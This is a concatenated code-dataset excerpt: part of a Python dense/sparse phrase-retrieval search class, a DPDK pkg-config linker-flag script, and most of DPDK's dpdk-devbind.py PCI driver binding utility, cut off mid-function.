start_scores, I = self.start_index.search(query_start, start_top_k)
query_norm = np.linalg.norm(query_start, ord=2, axis=1)
start_scores = self.scale_l2_to_ip(start_scores, max_norm=self.max_norm, query_norm=np.expand_dims(query_norm, 1))
# Get idxs from resulting I
doc_idxs, start_idxs = self.get_idxs(I)
# For record
num_docs = sum([len(set(doc_idx.flatten().tolist())) for doc_idx in doc_idxs]) / batch_size
self.num_docs_list.append(num_docs)
# Doc-level sparse score
b_doc_scores = self.doc_rank_fn['index'](q_texts, doc_idxs.tolist()) # Index
for b_idx in range(batch_size):
start_scores[b_idx] += np.array(b_doc_scores[b_idx]) * sparse_weight
return (doc_idxs, start_idxs), start_scores
def search_sparse(self, q_texts, query_start, doc_top_k, start_top_k, sparse_weight=0.05):
batch_size = query_start.shape[0]
# Reduce search space by doc scores
top_doc_idxs, top_doc_scores = self.doc_rank_fn['top_docs'](q_texts, doc_top_k) # Top docs
# For each item, add start scores
b_doc_idxs = []
b_start_idxs = []
b_scores = []
max_phrases = 0
for b_idx in range(batch_size):
doc_idxs = []
start_idxs = []
scores = []
for doc_idx, doc_score in zip(top_doc_idxs[b_idx], top_doc_scores[b_idx]):
try:
doc_group = self.get_doc_group(doc_idx)
except ValueError:
continue
start = self.dequant(doc_group, doc_group['start'][:])
cur_scores = np.sum(query_start[b_idx] * start, 1)
for i, cur_score in enumerate(cur_scores):
doc_idxs.append(doc_idx)
start_idxs.append(i)
scores.append(cur_score + sparse_weight * doc_score)
max_phrases = len(scores) if len(scores) > max_phrases else max_phrases
b_doc_idxs.append(doc_idxs)
b_start_idxs.append(start_idxs)
b_scores.append(scores)
# If start_top_k is larger than nonnegative doc_idxs, we need to cut them later
for doc_idxs, start_idxs, scores in zip(b_doc_idxs, b_start_idxs, b_scores):
doc_idxs += [-1] * (max_phrases - len(doc_idxs))
start_idxs += [-1] * (max_phrases - len(start_idxs))
scores += [-10**9] * (max_phrases - len(scores))
doc_idxs, start_idxs, scores = np.stack(b_doc_idxs), np.stack(b_start_idxs), np.stack(b_scores)
return (doc_idxs, start_idxs), scores
def batch_par_scores(self, q_texts, q_sparses, doc_idxs, start_idxs, sparse_weight=0.05, mid_top_k=100):
# Reshape for sparse
num_queries = len(q_texts)
doc_idxs = np.reshape(doc_idxs, [-1])
start_idxs = np.reshape(start_idxs, [-1])
default_doc = [doc_idx for doc_idx in doc_idxs if doc_idx >= 0][0]
groups = [self.get_doc_group(doc_idx) if doc_idx >= 0 else self.get_doc_group(default_doc)
for doc_idx in doc_idxs]
# Calculate paragraph start end location in sparse vector
para_lens = [group['len_per_para'][:] for group in groups]
f2o_start = [group['f2o_start'][:] for group in groups]
para_bounds = [[(sum(para_len[:para_idx]), sum(para_len[:para_idx+1])) for
para_idx in range(len(para_len))] for para_len in para_lens]
para_idxs = []
for para_bound, start_idx, f2o in zip(para_bounds, start_idxs, f2o_start):
para_bound = np.array(para_bound)
curr_idx = ((f2o[start_idx] >= para_bound[:,0]) & (f2o[start_idx] < para_bound[:,1])).nonzero()[0][0]
para_idxs.append(curr_idx)
para_startend = [para_bound[para_idx] for para_bound, para_idx in zip(para_bounds, para_idxs)]
# 1) TF-IDF based paragraph score
q_spvecs = self.doc_rank_fn['spvec'](q_texts) # Spvec
qtf_ids = [np.array(q) for q in q_spvecs[1]]
qtf_vals = [np.array(q) for q in q_spvecs[0]]
tfidf_groups = [self.get_tfidf_group(doc_idx) if doc_idx >= 0 else self.get_tfidf_group(default_doc)
for doc_idx in doc_idxs]
tfidf_groups = [group[str(para_idx)] for group, para_idx in zip(tfidf_groups, para_idxs)]
ptf_ids = [data['idxs'][:] for data in tfidf_groups]
ptf_vals = [data['vals'][:] for data in tfidf_groups]
tf_scores = self.sparse_bmm(qtf_ids, qtf_vals, ptf_ids, ptf_vals) * sparse_weight
# 2) Sparse vectors based paragraph score
q_ids, q_unis, q_bis = q_sparses
q_ids = [np.array(q) for q in q_ids]
q_unis = [np.array(q) for q in q_unis]
q_bis = [np.array(q)[:-1] for q in q_bis]
p_ids_tmp = [group['input_ids'][:] for group in groups]
p_unis_tmp = [group['sparse'][:, :] for group in groups]
p_bis_tmp = [group['sparse_bi'][:, :] for group in groups]
p_ids = [sparse_id[p_se[0]:p_se[1]]
for sparse_id, p_se in zip(p_ids_tmp, para_startend)]
p_unis = [self.dequant(groups[0], sparse_val[start_idx,:p_se[1]-p_se[0]], attr='sparse')
for sparse_val, p_se, start_idx in zip(p_unis_tmp, para_startend, start_idxs)]
p_bis = [self.dequant(groups[0], sparse_bi_val[start_idx,:p_se[1]-p_se[0]-1], attr='sparse')
for sparse_bi_val, p_se, start_idx in zip(p_bis_tmp, para_startend, start_idxs)]
sp_scores = self.sparse_bmm(q_ids, q_unis, p_ids, p_unis)
# For bigram
MAXV = 30522
q_bids = [np.array([a*MAXV+b for a, b in zip(q_id[:-1], q_id[1:])]) for q_id in q_ids]
p_bids = [np.array([a*MAXV+b for a, b in zip(p_id[:-1], p_id[1:])]) for p_id in p_ids]
sp_scores += self.sparse_bmm(q_bids, q_bis, p_bids, p_bis)
return np.reshape(tf_scores + sp_scores, [num_queries, -1])
def search_start(self, query_start, sparse_query, q_texts=None,
nprobe=16, doc_top_k=5, start_top_k=100, mid_top_k=20, top_k=5,
search_strategy='dense_first', sparse_weight=0.05, no_para=False):
assert self.start_index is not None
query_start = query_start.astype(np.float32)
batch_size = query_start.shape[0]
# start_time = time()
# 1) Branch based on the strategy (start_top_k) + doc_score
if search_strategy == 'dense_first':
(doc_idxs, start_idxs), start_scores = self.search_dense(
q_texts, query_start, start_top_k, nprobe, sparse_weight
)
elif search_strategy == 'sparse_first':
(doc_idxs, start_idxs), start_scores = self.search_sparse(
q_texts, query_start, doc_top_k, start_top_k, sparse_weight
)
elif search_strategy == 'hybrid':
(doc_idxs, start_idxs), start_scores = self.search_dense(
q_texts, query_start, start_top_k, nprobe, sparse_weight
)
(doc_idxs_, start_idxs_), start_scores_ = self.search_sparse(
q_texts, query_start, doc_top_k, start_top_k, sparse_weight
)
# There could be a duplicate but it's difficult to remove
doc_idxs = np.concatenate([doc_idxs, doc_idxs_], -1)
start_idxs = np.concatenate([start_idxs, start_idxs_], -1)
start_scores = np.concatenate([start_scores, start_scores_], -1)
else:
raise ValueError(search_strategy)
# 2) Rerank and reduce (mid_top_k)
rerank_idxs = np.argsort(start_scores, axis=1)[:,-mid_top_k:][:,::-1]
doc_idxs = doc_idxs.tolist()
start_idxs = start_idxs.tolist()
start_scores = start_scores.tolist()
for b_idx in range(batch_size):
doc_idxs[b_idx] = np.array(doc_idxs[b_idx])[rerank_idxs[b_idx]]
start_idxs[b_idx] = np.array(start_idxs[b_idx])[rerank_idxs[b_idx]]
start_scores[b_idx] = np.array(start_scores[b_idx])[rerank_idxs[b_idx]]
# logger.info(f'1st rerank ({start_top_k} => {mid_top_k}), {np.array(start_scores).shape}, {time()-start_time}')
# start_time = time()
# Para-level sparse score
if not no_para:
par_scores = self.batch_par_scores(q_texts, sparse_query, doc_idxs, start_idxs, sparse_weight, mid_top_k)
start_scores = np.stack(start_scores) + par_scores
start_scores = [s for s in start_scores]
# 3) Rerank and reduce (top_k)
rerank_idxs = np.argsort(start_scores, axis=1)[:,-top_k:][:,::-1]
for b_idx in range(batch_size):
doc_idxs[b_idx] = doc_idxs[b_idx][rerank_idxs[b_idx]]
start_idxs[b_idx] = start_idxs[b_idx][rerank_idxs[b_idx]]
start_scores[b_idx] = start_scores[b_idx][rerank_idxs[b_idx]]
doc_idxs = np.stack(doc_idxs)
start_idxs = np.stack(start_idxs)
start_scores = np.stack(start_scores)
# logger.info(f'2nd rerank ({mid_top_k} => {top_k}), {start_scores.shape}, {time()-start_time}')
return start_scores, doc_idxs, start_idxs
def search_end(self, query, doc_idxs, start_idxs, start_scores=None, top_k=5, max_answer_length=20):
# Reshape for end
num_queries = query.shape[0]
query = np.reshape(np.tile(np.expand_dims(query, 1), [1, top_k, 1]), [-1, query.shape[1]])
q_idxs = np.reshape(np.tile(np.expand_dims(np.arange(num_queries), 1), [1, top_k]), [-1])
doc_idxs = np.reshape(doc_idxs, [-1])
start_idxs = np.reshape(start_idxs, [-1])
start_scores = np.reshape(start_scores, [-1])
# Get query_end and groups
bs = int((query.shape[1] - 1) / 2) # Boundary of start
query_end, query_span_logit = query[:,bs:2*bs], query[:,-1:]
default_doc = [doc_idx for doc_idx in doc_idxs if doc_idx >= 0][0]
groups = [self.get_doc_group(doc_idx) if doc_idx >= 0 else self.get_doc_group(default_doc)
for doc_idx in doc_idxs]
ends = [group['end'][:] for group in groups]
spans = [group['span_logits'][:] for group in groups]
default_end = np.zeros(bs).astype(np.float32)
# Calculate end
end_idxs = [group['start2end'][start_idx, :max_answer_length]
for group, start_idx in zip(groups, start_idxs)] # [Q, L]
end_mask = -1e9 * (np.array(end_idxs) < 0) # [Q, L]
end = np.stack([[each_end[each_end_idx, :] if each_end.size > 0 else default_end
for each_end_idx in each_end_idxs]
for each_end, each_end_idxs in zip(ends, end_idxs)], 0) # [Q, L, d]
end = self.dequant(groups[0], end)
span = np.stack([[each_span[start_idx, i] for i in range(len(each_end_idxs))]
for each_span, start_idx, each_end_idxs in zip(spans, start_idxs, end_idxs)], 0) # [Q, L]
with torch.no_grad():
end = torch.FloatTensor(end).to(self.device)
query_end = torch.FloatTensor(query_end).to(self.device)
end_scores = (query_end.unsqueeze(1) * end).sum(2).cpu().numpy()
span_scores = query_span_logit * span # [Q, L]
scores = np.expand_dims(start_scores, 1) + end_scores + span_scores + end_mask # [Q, L]
pred_end_idxs = np.stack([each[idx] for each, idx in zip(end_idxs, np.argmax(scores, 1))], 0) # [Q]
max_scores = np.max(scores, 1)
# Get answers
out = [{'context': group.attrs['context'], 'title': group.attrs['title'], 'doc_idx': doc_idx,
'start_pos': group['word2char_start'][group['f2o_start'][start_idx]].item(),
'end_pos': (group['word2char_end'][group['f2o_end'][end_idx]].item() if len(group['word2char_end']) > 0
else group['word2char_start'][group['f2o_start'][start_idx]].item() + 1),
'start_idx': start_idx, 'end_idx': end_idx, 'score': score}
for doc_idx, group, start_idx, end_idx, score in zip(doc_idxs.tolist(), groups, start_idxs.tolist(),
pred_end_idxs.tolist(), max_scores.tolist())]
for each in out:
each['answer'] = each['context'][each['start_pos']:each['end_pos']]
out = [self.adjust(each) for each in out]
# Sort output
new_out = [[] for _ in range(num_queries)]
for idx, each_out in zip(q_idxs, out):
new_out[idx].append(each_out)
for i in range(len(new_out)):
new_out[i] = sorted(new_out[i], key=lambda each_out: -each_out['score'])
new_out[i] = list(filter(lambda x: x['score'] > -1e5, new_out[i])) # In case of no output but masks
return new_out
def filter_results(self, results):
out = []
for result in results:
c = Counter(result['context'])
if c['?'] > 3:
continue
if c['!'] > 5:
continue
out.append(result)
return out
def search(self, query, sparse_query, q_texts=None,
nprobe=256, doc_top_k=5, start_top_k=1000, mid_top_k=100, top_k=10,
search_strategy='dense_first', filter_=False, aggregate=False, return_idxs=False,
max_answer_length=20, sparse_weight=0.05, no_para=False):
# Search start
start_scores, doc_idxs, start_idxs = self.search_start(
query[:, :int((query.shape[1] -1) / 2)],
sparse_query,
q_texts=q_texts,
nprobe=nprobe,
doc_top_k=doc_top_k,
start_top_k=start_top_k,
mid_top_k=mid_top_k,
top_k=top_k,
search_strategy=search_strategy,
sparse_weight=sparse_weight,
no_para=no_para,
)
# start_time = time()
# Search end
outs = self.search_end(
query, doc_idxs, start_idxs, start_scores=start_scores,
top_k=top_k, max_answer_length=max_answer_length
)
# logger.info(f'last rerank ({top_k}), {len(outs)}, {time()-start_time}')
if filter_:
outs = [self.filter_results(results) for results in outs]
if return_idxs:
return [[(out_['doc_idx'], out_['start_idx'], out_['end_idx'], out_['answer']) for out_ in out ] for out in outs]
if doc_idxs.shape[1] != top_k:
logger.info(f"Warning.. {doc_idxs.shape[1]} only retrieved")
top_k = doc_idxs.shape[1]
return outs
``` |
{
"source": "jhyunleehi/poseidonos",
"score": 2
} |
#### File: buildtools/pkg-config/set-static-linker-flags.py
```python
import os
import sys
def fix_ldflag(f):
if not f.startswith('-lrte_'):
return f
return '-l:lib' + f[2:] + '.a'
def fix_libs_private(line):
if not line.startswith('Libs.private'):
return line
ldflags = [fix_ldflag(flag) for flag in line.split()]
return ' '.join(ldflags) + '\n'
def process_pc_file(filepath):
print('Processing', filepath)
with open(filepath) as src:
lines = src.readlines()
with open(filepath, 'w') as dst:
dst.writelines([fix_libs_private(line) for line in lines])
if 'MESON_BUILD_ROOT' not in os.environ:
print('This script must be called from a meson build environment')
sys.exit(1)
for root, dirs, files in os.walk(os.environ['MESON_BUILD_ROOT']):
pc_files = [f for f in files if f.endswith('.pc')]
for f in pc_files:
process_pc_file(os.path.join(root, f))
```
#### File: dpdk-20.08/usertools/dpdk-devbind.py
```python
from __future__ import print_function
import sys
import os
import getopt
import subprocess
from os.path import exists, abspath, dirname, basename
if sys.version_info.major < 3:
print("WARNING: Python 2 is deprecated for use in DPDK, and will not work in future releases.", file=sys.stderr)
print("Please use Python 3 instead", file=sys.stderr)
# The PCI base class for all devices
network_class = {'Class': '02', 'Vendor': None, 'Device': None,
'SVendor': None, 'SDevice': None}
acceleration_class = {'Class': '12', 'Vendor': None, 'Device': None,
'SVendor': None, 'SDevice': None}
ifpga_class = {'Class': '12', 'Vendor': '8086', 'Device': '0b30',
'SVendor': None, 'SDevice': None}
encryption_class = {'Class': '10', 'Vendor': None, 'Device': None,
'SVendor': None, 'SDevice': None}
intel_processor_class = {'Class': '0b', 'Vendor': '8086', 'Device': None,
'SVendor': None, 'SDevice': None}
cavium_sso = {'Class': '08', 'Vendor': '177d', 'Device': 'a04b,a04d',
'SVendor': None, 'SDevice': None}
cavium_fpa = {'Class': '08', 'Vendor': '177d', 'Device': 'a053',
'SVendor': None, 'SDevice': None}
cavium_pkx = {'Class': '08', 'Vendor': '177d', 'Device': 'a0dd,a049',
'SVendor': None, 'SDevice': None}
cavium_tim = {'Class': '08', 'Vendor': '177d', 'Device': 'a051',
'SVendor': None, 'SDevice': None}
cavium_zip = {'Class': '12', 'Vendor': '177d', 'Device': 'a037',
'SVendor': None, 'SDevice': None}
avp_vnic = {'Class': '05', 'Vendor': '1af4', 'Device': '1110',
'SVendor': None, 'SDevice': None}
octeontx2_sso = {'Class': '08', 'Vendor': '177d', 'Device': 'a0f9,a0fa',
'SVendor': None, 'SDevice': None}
octeontx2_npa = {'Class': '08', 'Vendor': '177d', 'Device': 'a0fb,a0fc',
'SVendor': None, 'SDevice': None}
octeontx2_dma = {'Class': '08', 'Vendor': '177d', 'Device': 'a081',
'SVendor': None, 'SDevice': None}
intel_ioat_bdw = {'Class': '08', 'Vendor': '8086', 'Device': '6f20,6f21,6f22,6f23,6f24,6f25,6f26,6f27,6f2e,6f2f',
'SVendor': None, 'SDevice': None}
intel_ioat_skx = {'Class': '08', 'Vendor': '8086', 'Device': '2021',
'SVendor': None, 'SDevice': None}
intel_ioat_icx = {'Class': '08', 'Vendor': '8086', 'Device': '0b00',
'SVendor': None, 'SDevice': None}
intel_ntb_skx = {'Class': '06', 'Vendor': '8086', 'Device': '201c',
'SVendor': None, 'SDevice': None}
network_devices = [network_class, cavium_pkx, avp_vnic, ifpga_class]
baseband_devices = [acceleration_class]
crypto_devices = [encryption_class, intel_processor_class]
eventdev_devices = [cavium_sso, cavium_tim, octeontx2_sso]
mempool_devices = [cavium_fpa, octeontx2_npa]
compress_devices = [cavium_zip]
misc_devices = [intel_ioat_bdw, intel_ioat_skx, intel_ioat_icx, intel_ntb_skx, octeontx2_dma]
# global dict ethernet devices present. Dictionary indexed by PCI address.
# Each device within this is itself a dictionary of device properties
devices = {}
# list of supported DPDK drivers
dpdk_drivers = ["igb_uio", "vfio-pci", "uio_pci_generic"]
# list of currently loaded kernel modules
loaded_modules = None
# command-line arg flags
b_flag = None
status_flag = False
force_flag = False
args = []
def usage():
'''Print usage information for the program'''
argv0 = basename(sys.argv[0])
print("""
Usage:
------
%(argv0)s [options] DEVICE1 DEVICE2 ....
where DEVICE1, DEVICE2 etc, are specified via PCI "domain:bus:slot.func" syntax
or "bus:slot.func" syntax. For devices bound to Linux kernel drivers, they may
also be referred to by Linux interface name e.g. eth0, eth1, em0, em1, etc.
Options:
--help, --usage:
Display usage information and quit
-s, --status:
Print the current status of all known network, crypto, event
and mempool devices.
For each device, it displays the PCI domain, bus, slot and function,
along with a text description of the device. Depending upon whether the
device is being used by a kernel driver, the igb_uio driver, or no
driver, other relevant information will be displayed:
* the Linux interface name e.g. if=eth0
* the driver being used e.g. drv=igb_uio
* any suitable drivers not currently using that device
e.g. unused=igb_uio
NOTE: if this flag is passed along with a bind/unbind option, the
status display will always occur after the other operations have taken
place.
--status-dev:
Print the status of given device group. Supported device groups are:
"net", "baseband", "crypto", "event", "mempool" and "compress"
-b driver, --bind=driver:
Select the driver to use or \"none\" to unbind the device
-u, --unbind:
Unbind a device (Equivalent to \"-b none\")
--force:
By default, network devices which are used by Linux - as indicated by
having routes in the routing table - cannot be modified. Using the
--force flag overrides this behavior, allowing active links to be
forcibly unbound.
WARNING: This can lead to loss of network connection and should be used
with caution.
Examples:
---------
To display current device status:
%(argv0)s --status
To display current network device status:
%(argv0)s --status-dev net
To bind eth1 from the current driver and move to use igb_uio
%(argv0)s --bind=igb_uio eth1
To unbind 0000:01:00.0 from using any driver
%(argv0)s -u 0000:01:00.0
To bind 0000:02:00.0 and 0000:02:00.1 to the ixgbe kernel driver
%(argv0)s -b ixgbe 02:00.0 02:00.1
""" % locals()) # replace items from local variables
# This is roughly compatible with check_output function in subprocess module
# which is only available in python 2.7.
def check_output(args, stderr=None):
'''Run a command and capture its output'''
return subprocess.Popen(args, stdout=subprocess.PIPE,
stderr=stderr).communicate()[0]
# check if a specific kernel module is loaded
def module_is_loaded(module):
global loaded_modules
if module == 'vfio_pci':
module = 'vfio-pci'
if loaded_modules:
return module in loaded_modules
# Get list of sysfs modules (both built-in and dynamically loaded)
sysfs_path = '/sys/module/'
# Get the list of directories in sysfs_path
sysfs_mods = [m for m in os.listdir(sysfs_path)
if os.path.isdir(os.path.join(sysfs_path, m))]
# special case for vfio_pci (module is named vfio-pci,
# but its .ko is named vfio_pci)
sysfs_mods = [a if a != 'vfio_pci' else 'vfio-pci' for a in sysfs_mods]
loaded_modules = sysfs_mods
return module in sysfs_mods
def check_modules():
'''Checks that igb_uio is loaded'''
global dpdk_drivers
# list of supported modules
mods = [{"Name": driver, "Found": False} for driver in dpdk_drivers]
# first check if module is loaded
for mod in mods:
if module_is_loaded(mod["Name"]):
mod["Found"] = True
# check if we have at least one loaded module
if True not in [mod["Found"] for mod in mods] and b_flag is not None:
print("Warning: no supported DPDK kernel modules are loaded", file=sys.stderr)
# change DPDK driver list to only contain drivers that are loaded
dpdk_drivers = [mod["Name"] for mod in mods if mod["Found"]]
def has_driver(dev_id):
'''return true if a device is assigned to a driver. False otherwise'''
return "Driver_str" in devices[dev_id]
def get_pci_device_details(dev_id, probe_lspci):
'''This function gets additional details for a PCI device'''
device = {}
if probe_lspci:
extra_info = check_output(["lspci", "-vmmks", dev_id]).splitlines()
# parse lspci details
for line in extra_info:
if len(line) == 0:
continue
name, value = line.decode("utf8").split("\t", 1)
name = name.strip(":") + "_str"
device[name] = value
# check for a unix interface name
device["Interface"] = ""
for base, dirs, _ in os.walk("/sys/bus/pci/devices/%s/" % dev_id):
if "net" in dirs:
device["Interface"] = \
",".join(os.listdir(os.path.join(base, "net")))
break
# check if a port is used for ssh connection
device["Ssh_if"] = False
device["Active"] = ""
return device
def clear_data():
'''This function clears any old data'''
global devices
devices = {}
def get_device_details(devices_type):
'''This function populates the "devices" dictionary. The keys used are
the pci addresses (domain:bus:slot.func). The values are themselves
dictionaries - one for each NIC.'''
global devices
global dpdk_drivers
# first loop through and read details for all devices
# request machine readable format, with numeric IDs and String
dev = {}
dev_lines = check_output(["lspci", "-Dvmmnnk"]).splitlines()
for dev_line in dev_lines:
if len(dev_line) == 0:
if device_type_match(dev, devices_type):
# Replace "Driver" with "Driver_str" to have consistency of
# of dictionary key names
if "Driver" in dev.keys():
dev["Driver_str"] = dev.pop("Driver")
if "Module" in dev.keys():
dev["Module_str"] = dev.pop("Module")
# use dict to make copy of dev
devices[dev["Slot"]] = dict(dev)
# Clear previous device's data
dev = {}
else:
name, value = dev_line.decode("utf8").split("\t", 1)
value_list = value.rsplit(' ', 1)
if len(value_list) > 1:
# String stored in <name>_str
dev[name.rstrip(":") + '_str'] = value_list[0]
# Numeric IDs
dev[name.rstrip(":")] = value_list[len(value_list) - 1] \
.rstrip("]").lstrip("[")
if devices_type == network_devices:
# check what is the interface if any for an ssh connection if
# any to this host, so we can mark it later.
ssh_if = []
route = check_output(["ip", "-o", "route"])
# filter out all lines for 169.254 routes
route = "\n".join(filter(lambda ln: not ln.startswith("169.254"),
route.decode().splitlines()))
rt_info = route.split()
for i in range(len(rt_info) - 1):
if rt_info[i] == "dev":
ssh_if.append(rt_info[i+1])
# based on the basic info, get extended text details
for d in devices.keys():
if not device_type_match(devices[d], devices_type):
continue
# get additional info and add it to existing data
devices[d] = devices[d].copy()
# No need to probe lspci
devices[d].update(get_pci_device_details(d, False).items())
if devices_type == network_devices:
for _if in ssh_if:
if _if in devices[d]["Interface"].split(","):
devices[d]["Ssh_if"] = True
devices[d]["Active"] = "*Active*"
break
# add igb_uio to list of supporting modules if needed
if "Module_str" in devices[d]:
for driver in dpdk_drivers:
if driver not in devices[d]["Module_str"]:
devices[d]["Module_str"] = \
devices[d]["Module_str"] + ",%s" % driver
else:
devices[d]["Module_str"] = ",".join(dpdk_drivers)
# make sure the driver and module strings do not have any duplicates
if has_driver(d):
modules = devices[d]["Module_str"].split(",")
if devices[d]["Driver_str"] in modules:
modules.remove(devices[d]["Driver_str"])
devices[d]["Module_str"] = ",".join(modules)
def device_type_match(dev, devices_type):
for i in range(len(devices_type)):
param_count = len(
[x for x in devices_type[i].values() if x is not None])
match_count = 0
if dev["Class"][0:2] == devices_type[i]["Class"]:
match_count = match_count + 1
for key in devices_type[i].keys():
if key != 'Class' and devices_type[i][key]:
value_list = devices_type[i][key].split(',')
for value in value_list:
if value.strip(' ') == dev[key]:
match_count = match_count + 1
# count must be the number of non None parameters to match
if match_count == param_count:
return True
return False
def dev_id_from_dev_name(dev_name):
'''Take a device "name" - a string passed in by user to identify a NIC
device, and determine the device id - i.e. the domain:bus:slot.func - for
it, which can then be used to index into the devices array'''
# check if it's already a suitable index
if dev_name in devices:
return dev_name
# check if it's an index just missing the domain part
elif "0000:" + dev_name in devices:
return "0000:" + dev_name
else:
# check if it's an interface name, e.g. eth1
for d in devices.keys():
if dev_name in devices[d]["Interface"].split(","):
return devices[d]["Slot"]
# if nothing else matches - error
raise ValueError("Unknown device: %s. "
"Please specify device in \"bus:slot.func\" format" % dev_name)
def unbind_one(dev_id, force):
'''Unbind the device identified by "dev_id" from its current driver'''
dev = devices[dev_id]
if not has_driver(dev_id):
print("Notice: %s %s %s is not currently managed by any driver" %
(dev["Slot"], dev["Device_str"], dev["Interface"]), file=sys.stderr)
return
# prevent us disconnecting ourselves
if dev["Ssh_if"] and not force:
print("Warning: routing table indicates that interface %s is active. "
"Skipping unbind" % dev_id, file=sys.stderr)
return
# write to /sys to unbind
filename = "/sys/bus/pci/drivers/%s/unbind" % dev["Driver_str"]
try:
f = open(filename, "a")
except:
sys.exit("Error: unbind failed for %s - Cannot open %s" %
(dev_id, filename))
f.write(dev_id)
f.close()
def bind_one(dev_id, driver, force):
'''Bind the device given by "dev_id" to the driver "driver". If the device
is already bound to a different driver, it will be unbound first'''
dev = devices[dev_id]
saved_driver = None # used to rollback any unbind in case of failure
# prevent disconnection of our ssh session
if dev["Ssh_if"] and not force:
print("Warning: routing table indicates that interface %s is active. "
"Not modifying" % dev_id, file=sys.stderr)
return
# unbind any existing drivers we don't want
if has_driver(dev_id):
if dev["Driver_str"] == driver:
print("Notice: %s already bound to driver %s, skipping" %
(dev_id, driver), file=sys.stderr)
return
else:
saved_driver = dev["Driver_str"]
unbind_one(dev_id, force)
dev["Driver_str"] = "" # clear driver string
# For kernels >= 3.15 driver_override can be used to specify the driver
# for a device rather than relying on the driver to provide a positive
# match of the device. The existing process of looking up
# the vendor and device ID, adding them to the driver new_id,
# will erroneously bind other devices too which has the additional burden
# of unbinding those devices
if driver in dpdk_drivers:
filename = "/sys/bus/pci/devices/%s/driver_override" % dev_id
if os.path.exists(filename):
try:
f = open(filename, "w")
except:
print("Error: bind failed for %s - Cannot open %s"
% (dev_id, filename), file=sys.stderr)
return
try:
f.write("%s" % driver)
f.close()
except:
print("Error: bind failed for %s - Cannot write driver %s to "
"PCI ID " % (dev_id, driver), file=sys.stderr)
return
# For kernels < 3.15 use new_id to add PCI id's to the driver
else:
filename = "/sys/bus/pci/drivers/%s/new_id" % driver
try:
f = open(filename, "w")
except:
print("Error: bind failed for %s - Cannot open %s"
% (dev_id, filename), file=sys.stderr)
return
try:
# Convert Device and Vendor Id to int to write to new_id
f.write("%04x %04x" % (int(dev["Vendor"],16),
int(dev["Device"], 16)))
f.close()
except:
print("Error: bind failed for %s - Cannot write new PCI ID to "
"driver %s" % (dev_id, driver), file=sys.stderr)
return
# do the bind by writing to /sys
filename = "/sys/bus/pci/drivers/%s/bind" % driver
try:
f = open(filename, "a")
except:
print("Error: bind failed for %s - Cannot open %s"
% (dev_id, filename), file=sys.stderr)
if saved_driver is not None: # restore any previous driver
bind_one(dev_id, saved_driver, force)
return
try:
f.write(dev_id)
f.close()
except:
# for some reason, closing dev_id after adding a new PCI ID to new_id
# results in IOError. however, if the device was successfully bound,
# we don't care for any errors and can safely ignore IOError
tmp = get_pci_device_details(dev_id, True)
if "Driver_str" in tmp and tmp["Driver_str"] == driver:
return
print("Error: bind failed for %s - Cannot bind to driver %s"
% (dev_id, driver), file=sys.stderr)
if saved_driver is not None: # restore any previous driver
bind_one(dev_id, saved_driver, force)
return
# For kernels > 3.15 driver_override is used to bind a device to a driver.
# Before unbinding it, overwrite driver_override with empty string so that
# the device can be bound to any other driver
filename = "/sys/bus/pci/devices/%s/driver_override" % dev_id
if os.path.exists(filename):
try:
f = open(filename, "w")
except:
sys.exit("Error: unbind failed for %s - Cannot open %s"
% (dev_id, filename))
try:
f.write("\00")
f.close()
except:
sys.exit("Error: unbind failed for %s - Cannot open %s"
% (dev_id, filename))
def unbind_all(dev_list, force=False):
"""Unbind method, takes a list of device locations"""
if dev_list[0] == "dpdk":
for d in devices.keys():
if "Driver_str" in devices[d]:
if devices[d]["Driver_str"] in dpdk_drivers:
unbind_one(devices[d]["Slot"], force)
return
try:
dev_list = map(dev_id_from_dev_name, dev_list)
except ValueError as ex:
print(ex)
sys.exit(1)
for d in dev_list:
unbind_one(d, force)
def bind_all(dev_list, driver, force=False):
"""Bind method, takes a list of device locations"""
global devices
# a common user error is to forget to specify the driver the devices need to
# be bound to. check if the driver is a valid device, and if it is, show
# a meaningful error.
try:
dev_id_from_dev_name(driver)
# if we've made it this far, this means that the "driver" was a valid
# device string, so it's probably not a valid driver name.
sys.exit("Error: Driver '%s' does not look like a valid driver. " \
"Did you forget to specify the driver to bind devices to?" % driver)
except ValueError:
# driver generated error - it's not a valid device ID, so all is well
pass
# check if we're attempting to bind to a driver that isn't loaded
if not module_is_loaded(driver.replace('-','_')):
sys.exit("Error: Driver '%s' is not loaded." % driver)
try:
dev_list = map(dev_id_from_dev_name, dev_list)
except ValueError as ex:
sys.exit(ex)
for d in dev_list:
bind_one(d, driver, force)
# For kernels < 3.15 when binding devices to a generic driver
# (i.e. one that doesn't have a PCI ID table) using new_id, some devices
# that are not bound to any other driver could be bound even if no one has
# asked them to. hence, we check the list of drivers again, and see if
# some of the previously-unbound devices were erroneously bound.
if not os.path.exists("/sys/bus/pci/devices/%s/driver_override" % d):
for d in devices.keys():
# skip devices that were already bound or that we know should be bound
if "Driver_str" in devices[d] or d in dev_list:
continue
# update information about this device
devices[d] = dict(devices[d].items() +
get_pci_device_details(d, True).items())
# check if updated information indicates that the device was bound
if "Driver_str" in devices[d]:
unbind_one(d, force)
def display_devices(title, dev_list, extra_params=None):
'''Displays to the user the details of a list of devices given in
"dev_list". The "extra_params" parameter, if given, should contain a string
with %()s fields in it for replacement by the named fields in each
device's dictionary.'''
strings = [] # this holds the strings to print. We sort before printing
print("\n%s" % title)
print("="*len(title))
if len(dev_list) == 0:
strings.append("<none>")
else:
for dev in dev_list:
if extra_params is not None:
strings.append("%s '%s %s' %s" % (dev["Slot"],
dev["Device_str"],
dev["Device"],
extra_params % dev))
else:
strings.append("%s '%s'" % (dev["Slot"], dev["Device_str"]))
# sort before printing, so that the entries appear in PCI order
strings.sort()
print("\n".join(strings)) # print one per line
def show_device_status(devices_type, device_name):
global dpdk_drivers
kernel_drv = []
dpdk_drv = []
no_drv = []
# split our list of network devices into the three categories above
for d in devices.keys():
if device_type_match(devices[d], devices_type):
if not has_driver(d):
no_drv.append(devices[d])
continue
if devices[d]["Driver_str"] in dpdk_drivers:
dpdk_drv.append(devices[d])
else:
kernel_drv.append(devices[d])
n_devs = len(dpdk_drv) + len(kernel_drv) + len(no_drv)
# don't bother displaying anything if there are no devices
if n_devs == 0:
msg = "No '%s' devices detected" % device_name
print("")
print(msg)
print("".join('=' * len(msg)))
return
# print each category separately, so we can clearly see what's used by DPDK
if len(dpdk_drv) != 0:
display_devices("%s devices using DPDK-compatible driver" % device_name,
dpdk_drv, "drv=%(Driver_str)s unused=%(Module_str)s")
if len(kernel_drv) != 0:
display_devices("%s devices using kernel driver" % device_name, kernel_drv,
"if=%(Interface)s drv=%(Driver_str)s "
"unused=%(Module_str)s %(Active)s")
if len(no_drv) != 0:
